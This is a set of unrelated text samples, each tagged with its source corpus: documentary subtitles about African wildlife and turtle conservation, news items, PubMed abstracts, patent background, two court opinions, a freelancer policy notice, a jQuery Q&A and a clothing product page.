young for the very first time." "(CHICK PEEPING)" "The coolness of the Benguela Current brought the penguins here." "But that very coolness is a great disadvantage because it generates little rain." "It can, however, produce moisture in a different form." "(RUMBLING)" "A thick blanket of fog rolls in from the sea and condenses on this thirsty land." "And each year, the desert bursts into life with a dazzling display." "Water is so scarce that this show will not last long, so plants compete to attract their pollinators with colour." "Here in Namaqualand, a 600-mile strip of coastal desert becomes carpeted with blooms." "The morning sun opens a Namaqua Daisy, and reveals a male monkey beetle asleep inside." "Nights here are so cold, that monkey beetles shelter within the closed up petals of the daisies." "The habit brings benefits to both sides." "The beetle is kept warm and the flower gets pollinated." "But now the beetle has urgent business." "He must find a mate." "(WINGS WHIRRING)" "As he searches, he hops from bloom to bloom, pollinating each in turn." "At last, he spots a potential mate." "A golden princess." "But here comes trouble." "A rival." "There's no time for introductions." "But he's been too slow." "The rivals immediately begin to brawl." "The female will only mate inside the daisy, so they wrestle for possession." "They're so engrossed in fighting they've pushed her off." "The challenger is ejected." "The winner wastes no time before getting back to business." "At last." "Now there will be a new generation of monkey beetles to pollinate these Namaqualand flowers." "For most of the year, this land is desperately dry, but just occasionally, brief, violent storms sweep in from the cold ocean." "(THUNDER RUMBLING)" "Springbok have been roaming this desert for many months, searching for one of these rare and highly-localised downpours." "(THUNDER RUMBLING)" "The grass is sprouting." "And that is worth celebrating." "If you're a springbok that means pronking." "We still don't know exactly why they do this." "The simplest answer is that they're dancing for joy." "Africa's most southerly tip." "This is where the two great ocean currents, the warm Agulhas and the cold Benguela, crash into one another." "And this collision, in itself, draws in life in abundance." "(DOLPHINS CHATTERING)" "A super-pod of hunting dolphins, 5,000 strong." "(DOLPHINS WHISTLING)" "And shadowing them," "Africa's biggest predator," "a Bryde's whale." "This female is 15 metres long and weighs more than a whole family of elephants." "The dolphins are in pursuit of sardines." "Millions of them!" "But these cold-water fish are heading towards an impenetrable barrier of warm water that they will not cross, the Agulhas Current." "(DOLPHINS WHISTLING)" "They're trapped." "And that gives the whale her chance." "But the sardines are so speedy that the whale only catches a few with each pass." "More and more hunters arrive." "(BIRDS HONKING)" "The whale needs the other hunters, to push the fish upwards, forcing them against the surface." "Now they have nowhere to escape." "With each lumbering turn, she loses precious time, time that favours the more nimble." "The Bryde's whale probably knows that this opportunity will last less than five minutes." "And with the last few lunges, she finally cashes in." "The forces that triggered this great event have also shaped the fortunes of life far beyond this particular battleground." "Without these currents, southern Africa would be a desert." "But combined, the very different powers of the Agulhas and the Benguela have transformed the Cape into a land where life can flourish." "The Comoros Islands off Africa's east coast, are a haven for green turtles." "Every year, a million turtles hatch on these beaches, but the chances of any one of them surviving is tiny." "(CAWING)" "(WAVES RUMBLING)" "The Africa team came here to try and capture the dramatic first few minutes in the lives of these baby turtles." "It was to be both a technical and surprisingly emotional challenge." "FLAY:" "It's only when you get down on the eye level of the baby turtle that you realise what an enormous journey it's got to make down the beach." "And it really is quite epic." "PEARSON:" "That's fine." "Oh, yeah, that's lovely." "It's using all these complicated, heavy bits of equipment, which hopefully will enable us to get into the world of a turtle which is just a few inches long." "As they break out of all the soft sand, they hit the hard sand and that's where the real sprint takes place." "They must be desperate to hit that water because you can see, the sea's just over the horizon." "We were following them all the way down and you do kind of get involved with them and cheering them on." "FLAY:" "Okay, slow down a bit, slow down." "And then suddenly all these crows come flocking in and start picking them off and you just think that's just so unfair." "PEARSON:" "Lots more coming in." "There's loads coming in now." "FLAY:" "And you've got to feel for them." "You know, it's really quite upsetting, particularly when you're looking through the camera and I'm just filling a frame with a turtle running down the beach, then suddenly from nowhere a beak comes in and that's it." "That turtle is no more." "ATTENBOROUGH:" "The turtles that escape the perils of the beach still have to face pounding surf." "But at last, they're in their element." "More than can be said for the crew." "PEARSON:" "They're faster than you, aren't they?" "MILLER:" "Yep." "It's a bit embarrassing." "MILLER:" "Beaten by something that's less than a day old. (ALL LAUGHING)" "When we saw hatchlings getting off the beach and you see them going in the white water you think they'd just get obliterated." "They just punch through the water, they do get flung around but then they just right themselves, keep on swimming, and they're ahead of you coming out the back of the wave and it's amazing." "MILLER:" "You're seeing all these baby turtles getting picked off left, right and centre, but they just keep going." "They are just so resilient." "(WAVES ROLLING)" "And that made what happened next so distressing." "A particularly high spring tide flooded the beach." "Any baby turtles still in their nests would be lucky to survive." "WOMAN:" " See it bubbling out as well." "PEARSON:" " Yeah." "KEVIN:" "Well, it means that basically anything below that line is going to be gone." "Let's hope and pray it's not, but..." "As you say, we don't know." "Let's wait and see." "All across the world, turtles are in decline." "Their eggs are stolen, the adults are hunted for their flesh, and they drown in fishing nets." "But here in the Comoros, they have friends." "PEARSON:" "It's amazing here in Itsamia." "It's just a really heartening story of how the local people are doing everything they can to protect, sort of, what they think of as their turtles." "And some of the baby turtles have survived the flood tide." "(SPEAKING FRENCH)" "YOUNG BOY:" "The whole village comes to help the hatchlings." "But the most important effort is to protect the adults from outsiders who would hunt them for their meat." "FLAY:" "They've taken it upon themselves to really police the beaches around here and make sure that poaching is kept to a minimum." "The selfless protection these people provide means that this is one of the few places in the world where turtle numbers are actually increasing." "And remarkably, here in Itsamia, the population has, in fact, doubled in the last decade." "As the shoot was coming to the end, cameraman Kevin Flay noticed that some of the turtles that made it through the surf, faced one last danger." "I'm getting shots of a kite which is flying down and taking turtles off the water surface." "That was a part of the story we had to tell." "The aim is for us to be underwater looking straight up as this happens and that's actually really quite hard." "WOMAN:" "Okay." "Three." "Two, one." "Undeterred, the crew got into position." "There we go, the kite's up." "MILLER:" "You can't see where you're going because my head's glued to this viewfinder so I'm banging into rocks and things like that." "I'm really just trying to keep the turtle in shot." "MILLER:" "Something came in then?" "She came in and swooped down over the water's surface." "And you could see the kite from underwater?" "I could see it." "I could see the shape." "PEARSON:" "In frame and you were running?" "MILLER:" "Yeah." "PEARSON:" "Didn't take the turtle." "MILLER:" "Didn't take the turtle." "PEARSON:" "That's the best of both worlds, because we got our lovely underwater shot of a kite and the turtle gets away!" "This lucky hatchling isn't the only one." "With the help of the village of Itsamia, thousands more have a chance to make it to the open ocean." "PEARSON:" "It's only really local populations that can actually support and sustain this conservation work." "If it comes from the roots upwards then it's got a chance of success." "FLAY:" "I think it's amazing, I really do, the fact that they do this and we should see it more often around the world." "It's hard not to admire these extraordinary little creatures as they battle against such odds." "This baby turtle won't touch land again until she returns to the very same island to lay her own eggs." "With luck, she'll find the beach is still protected by the people of Itsamia."
|
{
"pile_set_name": "OpenSubtitles"
}
|
This Week on Brian Ross Investigates Inside the House of Yahweh in Abilene, TX.
August 6, 2010 -- On this week's episode of "Brian Ross Investigates," ABC News Chief Investigative Correspondent Brian Ross takes you inside the House of Yahweh, a controversial compound in Texas run by a self-proclaimed prophet that critics call a "sex cult."
Cult expert Rick Ross joins Brian Ross on Skype, telling him that since an original "20/20" investigation aired, the House of Yahweh is still up and running. He discusses what attracts followers to these types of groups and what happens when they arrive at the compound, including brainwashing and the signing over of property.
"I've done interventions, hired by families to get people out cults, and this one in specific, and I can tell you it's really tough talking with them and getting them out of this group," said Ross.
Yisrayl Hawkins, the leader of the House of Yahweh, declined to appear with Ross on the show.
"Brian Ross Investigates" is a weekly 30-minute investigative news magazine show that features exclusive interviews, undercover videos and extended investigations and story updates.
"The show is part of our expanded digital efforts in this new age of news," Ross said. "It's an exciting venture that we hope will allow viewers to interact with our investigative team and offer input as we continue reporting."
"Brian Ross Investigates" airs every Friday on Hulu.com - CLICK HERE TO WATCH THE FULL EPISODES - and ABC News Now, the network's 24-hour news channel available throughout the U.S. and Europe, at 1:36pm. Each show is also available on mobile devices, including the iPhone and iPad.
Viewers can submit videos and personal thoughts on controversial issues and current topics through Facebook and Twitter, including the "Skype Gripe" segment, in which viewers are invited to interact with Ross about recent investigations.
CLICK HERE TO SKYPE GRIPE.
To join in on the discussion and be part of the show, follow Brian Ross on Twitter at @BrianRoss, the Investigative Team at @ABCNewsBlotter, and on Facebook (ABC News Investigative Team).
CLICK HERE to follow the ABC News Investigative Team's coverage on Twitter.
This week is the 18th episode of "Brian Ross Investigates." All shows are archived on Hulu for viewing.
Click Here for the Blotter Homepage.
|
{
"pile_set_name": "OpenWebText2"
}
|
Art of Noise – Drum & Bass Collection
After re-discovering this compilation whilst digging through an old box of CD’s I thought it’d be a good one to share, given it’s impressive artist listing.
If you’re not familiar with Art of Noise then take a gander at their wiki for some history.
Now that you have read up on AON’s history, you should know that the remixes do not have a lot to do with the original songs. A review on Amazon for the disk describes it pretty accurately.
“This is the electronica equivalent of a tribute album: Instead of gathering bands together to cover the songs of an influential group, here we have a bunch of more or less well-known DJs (including members of Goldie’s Metalheadz crew) remixing and reconstructing actual recorded works in their own image, namely with drum and bass (a.k.a. jungle) beats. In this case, the object of affection is Art of Noise, a clear forerunner to the current boom in sampled and spliced dance music.”
Some of the DnB luminaries that rework the tracks include Lemon D, J Majik, Doc Scott, and Dom&Roland. However, my favorite tune on the comp is the PFM remix of Opus 4. It is pure 90s atmospheric magic in my opinion…
All the MP3s in the compilation are encoded at 128k and they sound good enough to play out.
|
{
"pile_set_name": "Pile-CC"
}
|
1. Field of the Invention
This invention relates to contact lenses and has particular reference to apparatus and method for casting the lenses to finished size, shape and desired edge configuration in a single operation.
2. Discussion of the Prior Art
In the manufacture of "soft" contact lenses, e.g. of cast silicon resin, edge finishing ordinarily consumes a very high percentage of the total labor required to make and inspect each lens. Edge finishing includes all operations involved in sizing a lens to desired diameter, contouring the edge to a comfortable shape and polishing or otherwise smoothing its surfaces. Prior art finishing equipment can be expected to cost more than half the total equipment cost (molds excepted) and occupy as much or more than half of the total manufacturing floor space with as much as three-quarters of the quantity yield losses for an entire lens manufacturing operation being attributed to the group of edge finishing steps. Additionally, the quality of contour and finish of the best of prior art edge finished lenses is usually considered only fair.
The disclosures of U.S. Pat. Nos. 2,990,664; 3,087,284; 3,160,039; 3,162,985; 3,369,329; 3,423,886; 3,458,959; 3,528,326; 3,835,590 and 3,948,007 are exemplary of lens edge finishing procedures and apparatuses.
Centrifugal casting technique, e.g. as in U.S. Pat. Nos. 3,408,429; 3,660,545 and 3,496,254 have been used with the objective, among others, of avoiding lens material shrinkage problems in the forming of thin edged lenses. The spin cast lens edge, however, becomes the edge of the posterior or concave surface of the lens. This surface is formed as a result of centrifugal forces, surface tension of the polymerizing lens material and other factors such as mold size and shape, volume, viscosity and volatility of the polymerizing mixture, condition of the mold surface, etc. The resulting surface accordingly becomes not only approximately parabolic in shape but very difficult to control and reproduce. There being no truly spherical optical zone and optimum optical quality is lacking. Also, post-polymerization edge finishing is usually required.
While lens edges requiring a minimum of finishing have been formed in systems which produce desirable lens surface profiles, e.g. as in U.S. Pat. Nos. 3,761,208; 3,915,609 and 4,017,238, parting lines between mold halves form the edges in locations which are subject to causing patient discomfort. For example, in the three-piece mold of U.S. Pat. No. 3,761,208 (FIGS. 1-6), two parting lines result at opposite sides of the cast lens edge. One would rest against the cornea and the other be engaged by the eyelid in use of the lens. These parting lines are very difficult and unduly costly to blend to the extent necessary for overcoming patient discomfort, especially in quantity production. On the other hand, the two-piece mold of U.S. Pat. No. 3,761,208 (FIG. 7) would inherently produce an edge flange requiring removal, e.g. by one or another of the aforesaid edge finishing procedures. It would be difficult for production quantities to obtain precise alignment of the mold halves in FIG. 7 of U.S. Pat. Nos. 3,761,208 so as to not produce a step at the parting line.
In the embodiments of U.S. Pat. Nos. 3,915,609 and 4,017,238, the sharp edge contact between a circular margin of one mold half and a spherically curved peripheral portion of the other mold half can minimize, if not eliminate, the need for most edge finishing operations. However, the mold parting lines may cause the cast lens edges to be located at positions and to extents tending to cause patient discomfort.
The foregoing comments illustrate the need in the present art for elimination of conventional costly and relatively ineffectual edge finishing operations and especially the need for improved lens edge design as well as apparatus and method all for accomplishing enhanced contact lens wearing comfort.
It is, accordingly, a principal object of the invention to provide a cast contact lens of improved edge design as well as apparatus and method of making the same.
A more specific object is to provide a contact lens which may be cast between separable mold halves having a single continuous mold parting line about the periphery of the lens casting cavity in a position relative to the cast lens edge which will lie between the eyelid and cornea and not rub on either when the lens is worn.
A corrollary objective is that of preventing occurrences of mold parting line blemishing or marking of cast contact lens edges at positions subject to engaging either the cornea or eyelid when the lenses are worn and further providing for modification of lens edge profile as needed to meet these particular requirements in various lens fitting situations.
The foregoing and other objects and advantages of the invention will become apparent from the following description.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
Warning: require_once(/home/safetypro/public_html/professorsafety.com/wp-settings.php): failed to open stream: No such file or directory in /home/safetypro/public_html/professorsafety.com/wp-config.php on line 93
|
{
"pile_set_name": "Pile-CC"
}
|
NEW DELHI — India has lodged a protest with the United States government after several Indian students were detained there in connection with their enrollment in a fake university, after an undercover operation.
The American authorities said this past week that they had indicted eight people accused of exploiting the country’s student visa system. They were said to have helped foreign nationals illegally remain in the United States by enrolling them into the University of Farmington in Farmington Hills, Mich., which billed itself as a “nationally accredited business and STEM institution” with an innovative curriculum, flexible class schedules and a diverse student body.
But the private university was being secretly operated by agents of the Department of Homeland Security to expose immigration fraud, according to federal prosecutors who announced charges in the case.
The Indian government said on Saturday that it had issued a rare “démarche” to the United States Embassy in New Delhi, telling it that Indian officials needed immediate consular access to the detainees.
|
{
"pile_set_name": "OpenWebText2"
}
|
Drivers' estimates of time to collision.
Drivers' estimates of time to collision were determined in a laboratory simulation using film segments made from a following vehicle approaching a lead vehicle, which was also in motion. Headway, approach speed, and viewing time were varied to make a total of 48 conditions. It was found that, provided the angular velocity subtended by the lead vehicle was above a threshold value of about .003 radians/sec, the driver was able to give reasonable estimates of time to collision. The standard deviation of the estimates varied linearly with the time to collision. Although drivers underestimated the time to collision when it was small, the large standard deviation shows the possibility of rear-end collisions due to poor estimation of time to collision, especially when the times for control action and vehicle deceleration are considered.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
[DO NOT PUBLISH]
IN THE UNITED STATES COURT OF APPEALS
FILED
FOR THE ELEVENTH CIRCUIT U.S. COURT OF APPEALS
________________________ ELEVENTH CIRCUIT
JUNE 22, 2009
No. 08-14661 THOMAS K. KAHN
Non-Argument Calendar CLERK
________________________
D. C. Docket Nos. 03-20335-CV-SH, 00-00933 CR-SH
RAUL ESPINOSA,
Petitioner-Appellant,
versus
UNITED STATES OF AMERICA,
Respondent-Appellee.
________________________
Appeal from the United States District Court
for the Southern District of Florida
_________________________
(June 22, 2009)
Before CARNES, HULL and WILSON, Circuit Judges.
PER CURIAM:
Raul Espinosa appeals the district court’s denial of his 28 U.S.C. § 2255
motion to vacate his sentence. After review, we affirm.
I. BACKGROUND
Following a jury trial, Espinosa was convicted of money laundering and
sentenced to a term of 189 months’ imprisonment. Espinosa’s conviction was
affirmed on direct appeal. His conviction became final on February 13, 2003, with
the expiration of the time for filing a petition for certiorari.
On February 14, 2003, Espinosa filed his counseled § 2255 motion, raising
claims that his trial counsel was ineffective at trial and sentencing. At an
evidentiary hearing on December 12, 2005, Espinosa also argued that his trial
counsel had been ineffective prior to trial by failing to communicate with him
regarding, inter alia, the government’s discovery information, the facts of the case,
potential defense witnesses or a defense theory. After the hearing, the magistrate
judge directed Espinosa to prepare a supplemental memorandum outlining his
specific claims and the government to file a response.
In his supplemental memorandum, filed on January 3, 2006, Espinosa
identified six pretrial ineffective assistance claims. Specifically, he alleged that his
trial counsel: (1) did not discuss the indictment, charges or sentencing options with
him; (2) met with him only a few brief times; (3) did not discuss with him a
defense theory, trial strategy or factual or legal defenses; (4) did not inform him of
2
his right to testify; (5) did not prepare him for a pre-trial McLain hearing;1 and (6)
did not review the government’s discovery material.
The magistrate judge’s report (“R&R”) recommended denying Espinosa’s
§ 2255 motion. With respect to Espinosa’s six pretrial ineffective assistance
claims identified in his January 3, 2006 supplemental memorandum, the magistrate
judge concluded that only one–the failure to inform Espinosa of his right to
testify–was raised in the original § 2255 motion. The magistrate judge found that
the other five pretrial ineffective assistance claims were newly raised claims that
did not relate back to the claims in his § 2255 motion. Because the newly raised
claims were in the January 3, 2006 supplemental memorandum and that
supplemental memorandum was not filed within the Antiterrorism and Effective
Death Penalty Act’s (“AEDPA”) one-year statute of limitations, the magistrate
judge concluded the new claims were time-barred.
As for the preserved pretrial ineffective assistance claim, the magistrate
judge concluded that Espinosa had not shown any prejudice with respect to his trial
counsel’s failure to inform him of his right to testify. The magistrate judge also
1
Under United States v. McLain, a defendant must be informed if a criminal investigation
against his attorney creates a potential conflict of interest. 823 F.2d 1457, 1463-64 (11th Cir.
1987), overruled on other grounds as recognized by United States v. Watson, 866 F.2d 381, 385
n.3 (11th Cir. 1989). Espinosa’s trial counsel had been indicted on state racketeering, fraud and
theft charges. At the McLain hearing, Espinosa indicated that he wished to keep his trial
counsel.
3
found that Espinosa had failed to show any ineffective assistance with respect to
his trial or sentencing.
Over Espinosa’s objections, the district court adopted the R&R and denied
Espinosa’s § 2255 motion. Espinosa filed this appeal. We granted a certificate of
appealability (“COA”) on the following issue:
Whether the district court erred in finding that appellant’s argument,
raised in his post-evidentiary hearing brief, that his counsel was
ineffective for failing to discuss with him possible defenses, a defense
theory or trial strategy prior to trial did not relate back to his 28
U.S.C. § 2255 motion and was thus, untimely.2
II. DISCUSSION
The AEDPA established a one-year statute of limitations for § 2255
motions. 28 U.S.C. § 2255(f); Davenport v. United States, 217 F.3d 1341, 1343
(11th Cir. 2000). When a petitioner files a timely § 2255 motion, and then later
files an untimely amended or supplemental motion that raises additional claims, the
untimely claims are barred by the statute of limitations unless they “relate back” to
the original motion under Federal Rule of Civil Procedure 15(c). Davenport, 217
F.3d at 1344. A claim “relates back” if it “asserts a claim or defense that arose out
of the conduct, transaction, or occurrence set out--or attempted to be set out--in the
original pleading.” Fed. R. Civ. P. 15(c)(1)(B).
2
Thus, the district court’s rulings on Espinosa’s other ineffective assistance claims are not
before us.
4
The United States Supreme Court has cautioned that the “conduct,
transaction, or occurrence” language of Rule 15(c) should not be defined “at too
high a level of generality,” because doing so would defeat Congress’s intent to
impose a strict time limit on claims for post-conviction relief. Mayle v. Felix, 545
U.S. 644, 661-62, 125 S. Ct. 2562, 2573-74 (2005) (quotation marks omitted).
Thus, an amended pleading relates back to an original pleading only if both
pleadings “state claims that are tied to a common core of operative facts.” Id. at
664, 125 S. Ct. at 2574. Similarly, this Court has held that “the untimely claim
must have arisen from the same set of facts as the timely filed claim, not from
separate conduct or a separate occurrence in both time and type.” Davenport, 217
F.3d at 1344 (quotation marks omitted). “[W]hile Rule 15(c) contemplates that
parties may correct technical deficiencies or expand facts alleged in the original
pleading, it does not permit an entirely different transaction to be alleged by
amendment.” Dean v. United States, 278 F.3d 1218, 1221 (11th Cir. 2002).3
Here, the district court did not abuse its discretion in finding that the pretrial
ineffective assistance claims raised in Espinosa’s supplemental memorandum did
3
In the § 2255 context, we review the district court’s legal conclusions de novo and its
findings of fact for clear error. Mamone v. United States, 559 F.3d 1209, 1210 (11th Cir. 2009).
We review a district court’s application of Rule 15(c) for abuse of discretion. Davenport, 217
F.3d at 1343 n.4.
5
not relate back to his original § 2255 motion filed on February 14, 2003.4
Espinosa’s § 2255 motion alleged that his trial counsel made an improper opening
statement, failed to object to Rule 404(b) evidence, conducted unnecessary,
improper and ineffective cross-examinations and failed to object to the presentence
investigation report. In other words, the conduct, transaction or occurrences set out
in the original § 2255 motion related to trial counsel’s performance during specific
moments of the trial and at sentencing. With the exception of his counsel’s failure
to advise him of his right to testify at trial, the § 2255 motion made no mention of
any pretrial conduct. Indeed, Espinosa’s counseled § 2255 motion’s contention
that his counsel was unprepared was made only in the context of claims that his
trial counsel’s performance at trial and sentencing was deficient. Thus, the newly
raised pretrial ineffective assistance claims are not “tied to a common core of
operative facts” with the trial and sentencing ineffective assistance claims and do
not relate back under Rule 15(c). See Mayle, 545 U.S. at 664, 125 S. Ct. at 2574.
And, his supplemental memorandum does not merely provide specifics to a claim
previously made in Espinosa’s original § 2255 motion, but raises new claims.
Accordingly, the district court did not abuse its discretion in ruling that the
4
Although Espinosa argues that the government waived any argument with respect to the
timeliness of his pretrial ineffective assistance claims by not objecting at the evidentiary hearing,
this argument is outside the scope of the COA, and, therefore, we do not consider it. See Murray
v. United States, 145 F.3d 1249, 1250-51 (11th Cir. 1998).
6
new claims in the supplemental memorandum did not relate back to the original
§ 2255 motion under Rule 15(c)(1)(B).
AFFIRMED.
7
|
{
"pile_set_name": "FreeLaw"
}
|
In vivo debridement efficacy of ultrasonic irrigation following hand-rotary instrumentation in human mandibular molars.
This study histologically compared the in vivo debridement efficacy of hand/rotary canal preparation versus a hand/rotary/ultrasound technique in mesial root canals of vital mandibular molars. Group 1 consisted of 16 teeth prepared with a hand/rotary technique whereas group 2 consisted of 15 teeth prepared in similar fashion but followed by 1 min of ultrasonic irrigation, per canal, utilizing an ultrasonic needle in a MiniEndo unit. Five uninstrumented mandibular molars served as histologic controls. After extraction and histologic preparation, 0.5 microm cross-sections, taken every 0.2 mm from the 1- to 3-mm apical levels, were evaluated for percentage of tissue removal. Nonparametric analysis revealed mean percent canal and isthmus cleanliness values to be significantly higher for group 2 at all levels evaluated, except one. In conclusion, the 1 min use of the ultrasonic needle after hand/rotary instrumentation resulted in significantly cleaner canals and isthmuses in the mesial roots of mandibular molars.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Immune interactions at the maternal-fetal interface.
Models of murine allogeneic pregnancy have established that maternal T cells recognize fetal alloantigens and are normally suppressed or deleted. While the precise cellular interactions and mechanisms involved in maternal lymphocyte tolerance are not yet clear, the identity of some of the critical factors are beginning to be uncovered. Signals that have been shown in mice to have an obligatory role in immunological survival of the semiallogeneic fetus include, but are probably not limited to, indoleamine-2,3-dioxygenase and the newly discovered B7 family protein, B7-H1. Whether these proteins have intersecting functions is unknown, but it is possible that both are involved in the control of maternal T regulatory cells, which are also strictly required for successful allogeneic pregnancy in mice. Additional factors that are involved include trophoblast and/or maternally derived FasL, and in humans, class Ib HLA molecules. The potency of these mechanisms in protecting the fetal allograft is underscored by the scarcity of knockout and transgenic models in which pregnancy is immunologically compromised. Here, the current understanding of mechanisms of specific suppression of maternal lymphocytes is reviewed.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
4. Freelancer Terms of Service Compliance Notice
Why did I receive this notice?
You have received a notice that your AceBy account may be closed in 30 days because we have become aware of a possible violation of our Terms of Service (TOS). We enforce our TOS in order to provide a safe and trusted platform where freelancers and their employers can hire, pay and receive contracted work with confidence.
AceBy likely became aware of a potential issue due to your low level of employer's satisfaction. Low employer's satisfaction indicates a violation of AceBy TOS for a number of reasons. The TOS requires freelancers to fulfill their contractual obligations to their employers by delivering high-quality work. In addition, the TOS requires you to accurately describe your business, your skills and qualifications, and the services you offer. If your employer's satisfaction score increases, AceBy, in most cases, will understand that you have corrected the issues.
Does this notice restrict my account in any way?
No, this is simply a notice. We value your business and hope you will take this time to re-evaluate your practices to improve your employers’ satisfaction. Your account will be checked in 30 days and may be closed at that time if we continue to see that you are not fulfilling your obligations to your employers, the AceBy community, or AceBy.
What can I do now?
Contract obligations come first: When you enter into a contract with your employer, make sure you understand what obligations you are undertaking. Failing to meet employer expectations inevitably results in low employer's satisfaction and/or payment disputes.
Only take projects you are qualified for and can deliver on budget and on time: When you accept a contract with your employer, you are promising to deliver certain work at a certain cost and by a certain time.If the scope of the work changes at any time, make sure to update the deadlines in your agreement with the employer to consistently remain on time and budget.
Good communication can be key to a good employer-freelancer relationship. Never use abusive or inappropriate language and always behave professionally.
I have 5-star feedback! Why did I receive a notice?
Public feedback is just one of many factors we consider. We also look at disputes and other employer's concerns and complaints, along with a freelancer's entire history on Costopus.
I had one or two contracts where I didn't receive feedback. Is this why I received this notice? Should I make my employers provide feedback about my business?
We know that you don’t always have control over whether your employers provide feedback. Contracts that end without feedback will not be the only reason you receive a notice.
I had one or two bad contracts because the employer with whom I was working was bad. Why am I being punished for the conduct of another person.?
We understand that bad outcomes can arise from poor employer behavior and we take this and other factors into consideration.
Did I receive a notice because one of my contracts is “paused”?
No, the occasional paused contract on the platform will not result in a notice.
|
{
"pile_set_name": "Pile-CC"
}
|
641 So.2d 184 (1994)
SECURITY MANAGEMENT CORP., Appellant,
v.
HARTFORD FIRE INSURANCE Company, etc., Appellee.
No. 93-2107.
District Court of Appeal of Florida, Third District.
August 17, 1994.
*185 Weil, Lucio, Mandler, Croland & Steele and Lawrence D. Goodman and John C. Hanson, II, Miami, for appellant.
Haley, Sinagra & Perez and James T. Haley, Miami, for appellee.
Before SCHWARTZ, C.J., and JORGENSON and GODERICH, JJ.
JORGENSON, Judge.
Security Management Corp. (Security) appeals from an order of final judgment in favor of Hartford Fire Insurance Company (Hartford). We affirm in part, reverse in part, and remand with directions.
Security entered into a builders' risk insurance contract with Hartford for the period of July 1, 1985, to July 1, 1986. As to the premium for the policy, Security and Hartford agreed to a retrospective premium formula. This formula provided that Security would be charged a minimum of a $50,000 premium and a maximum of a $150,000 premium for the year of insurance coverage. Essentially, if the value of the covered properties increased or losses were paid, the premium could be adjusted up to the $150,000 maximum. Security paid the $50,000 minimum premium at the inception of the insurance policy.
In December of 1985, a fire occurred on the insured property. Security made a claim on Hartford for the policy limits. By draft dated June 6, 1986, Hartford paid the claim notwithstanding the fact that it had cancelled the insurance coverage on February 4, 1986.
Hartford subsequently adjusted the premium upwards to $150,000 based upon the retrospective premium formula. After crediting Security with the $50,000 it had already paid, Hartford rendered a statement to Security in the amount of $100,000. Security refused payment alleging it had never agreed to the retrospective premium formula. Hartford then sued Security based on open account, account stated, and services rendered. The trial court entered final judgment in favor of Hartford and found that Security was liable in the amount of $100,000 plus interest.
The trial court properly found that Hartford was entitled to increase the insurance policy premium pursuant to the retrospective rating formula. Despite Security's argument to the contrary, its conduct demonstrates that it accepted the terms and conditions of the retrospective rating formula. See James Register Constr. Co. v. Bobby Hancock Acoustics, Inc., 535 So.2d 339 (Fla. 1st DCA 1988) (mutuality of assent may be *186 shown through acts or conduct of the parties); Gateway Cable T.V., Inc. v. Vikoa Constr. Corp., 253 So.2d 461 (Fla. 1st DCA 1971) (same).
Security never transmitted any objection to Hartford with respect to the retrospective rating formula. It provided monthly valuation reports to Hartford as required by the insurance policy, made a claim under the policy, and accepted payment of the claim. These facts all demonstrate that Security assented to the entire insurance policy, including the retrospective rating formula endorsement.[1] As Security is legally bound by the retrospective premium endorsement, Hartford is entitled to any increase in premium contemplated by the parties' agreement.
Nevertheless, the trial court erred in not taking into account the fact that Hartford cancelled the yearlong policy after only seven months. "As a general rule, an insurer ... upon cancelling a policy must return advance premiums which have been paid and are unearned." George J. Couch et al., Couch on Insurance 2d 34:29 at 884-86 (1985).[2]See also Graves v. Iowa Mut. Ins. Co., 132 So.2d 393 (Fla. 1961); Bradley v. Associates Discount Corp., 58 So.2d 857 (Fla. 1952); Aetna Casualty & Sur. Co. v. Simpson, 128 So.2d 420 (Fla. 1st DCA 1961).[3]
No provision in the Hartford insurance policy addresses the issue of the return of unearned premiums. However, this was a one-year insurance contract and the additional $100,000 Hartford demanded was supposed to have represented a full year's premium. Accordingly, we reverse the amount of damages awarded. On remand, Security may litigate the issue of its entitlement to a proration for the last five months of the insurance contract.
Affirmed in part; reversed in part; remanded with directions.
NOTES
[1] Even assuming that Security's conduct did not demonstrate assent to the entire insurance policy, it would still be bound by the terms of the retrospective rating formula. "[A]n insurance broker is the agent of the insured in matters connected with the procurement of insurance." AMI Ins. Agency v. Elie, 394 So.2d 1061, 1062 (Fla. 3d DCA 1981); Liberty Mut. Ins. Co. v. Scalise, 627 So.2d 87, 91 (Fla. 1st DCA 1993). The retrospective rating formula was included in the insurance binder which was prepared and executed by B.R.I. Coverage Corporation, Security's insurance broker and agent. "[B]ecause the broker was the agent of the insured, the insured was bound by the agent's actions." Empire Fire & Marine Ins. Co. v. Koven, 402 So.2d 1352, 1353 (Fla. 4th DCA 1981).
[2] See also 30 Fla.Jur.2d Insurance 457 (1981) ("Contracts of insurance on property ... generally provide for ... the return of the unearned portion of the premium paid by the insured."); 45 C.J.S. Insurance 500 (1993) ("Ordinarily, ... the return or tender of the unearned premium to the insured is a condition precedent to cancellation of the policy... .").
[3] Though no similar provision exists for builders' risk insurance, as to health insurance policies section 627.626, Florida Statutes (1985) provides: "In the event of cancellation, the insurer will return promptly the unearned portion of any premium paid." See also 627.848, Florida Statutes (1985) (insurer who cancels an insurance contract which contains a premium finance agreement shall promptly refund any remaining unearned premium for the benefit of the insured).
|
{
"pile_set_name": "FreeLaw"
}
|
Q:
Learning jQuery, but nothing is happening?
I'm trying to use jQuery, but for some reason nothing is happening when I click a button. I've tried manipulating the code in many ways, but still nothing happens
I'm using Firefox, and javascript works fine.
Here's my code:
<!DOCTYPE html>
<html>
<head>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.0/jquery.min.js"></script>
<style>
body {
background-color:royalblue;
margin:0px;
}
#div_header {
background-color:black;
height:200px;
}
</style>
<script type="text/javascript">
$(document).ready(function() {
$("button").click(function() {
$("#div_header").hide();
});
});
</script>
</head>
<body>
<div id="div_header">
<button type="button">Click me!</button>
</div>
</body>
</html>
A:
The script source value is incorrect. Change it to
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.0/jquery.min.js"></script>
|
{
"pile_set_name": "StackExchange"
}
|
Men's Wapato Long-Sleeve Henley Shirt
Live Your Adventure®
Built for maximum comfort, whether active or relaxed, this pullover henley is made with lightweight cotton/polyester slub yarns in a soft thermal knit. Rib-knit cuffs provide a secure fit, and woven chambray reinforces the inside of the button placket.
60% cotton/40% polyester
Machine wash
Imported
FIT
Classic: Our most universal fit. Not too slim, not too relaxed on body.
Find in store
Not available for Clearance items
Find in store
Not currently available in store
GUARANTEED FOR LIFE
Every product we sell carries a lifetime warranty. If you are unhappy with it for any reason, you may return it for an exchange or refund.
